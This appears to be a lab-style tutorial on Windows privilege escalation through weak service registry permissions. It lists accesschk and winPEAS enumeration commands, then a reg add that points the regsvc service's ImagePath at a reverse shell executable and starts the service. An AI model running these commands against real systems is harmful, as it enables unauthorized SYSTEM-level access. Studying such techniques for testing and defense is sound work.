Weak Registry Permissions

The Windows registry stores entries for each service. Since registry entries can have ACLs, if the ACL is misconfigured, it may be possible to modify a service’s configuration even if we cannot modify the service directly.

accesschk.exe -accepteula -wuvc "Everyone" *
accesschk.exe -accepteula -wuvc "Users" *
accesschk.exe -accepteula -wuvc "Authenticated Users" *

Run winPEAS to check for service misconfigurations:

winPEASany.exe quiet servicesinfo

Note that the “regsvc” service has a weak registry entry. We can confirm this with PowerShell:

Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List

Alternatively accesschk.exe can be used to confirm:

accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

verify that we can start the service:

accesschk.exe /accepteula -ucqv user regsvc

now lets check the current value of the service registry entry:

reg query HKLM\System\CurrentControlSet\Services\regsvc

Overwrite the ImagePath registry key to point to our reverse shell executable:

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f

Start a listener on Kali, and then start the service to trigger the exploit:

 net start regsvc

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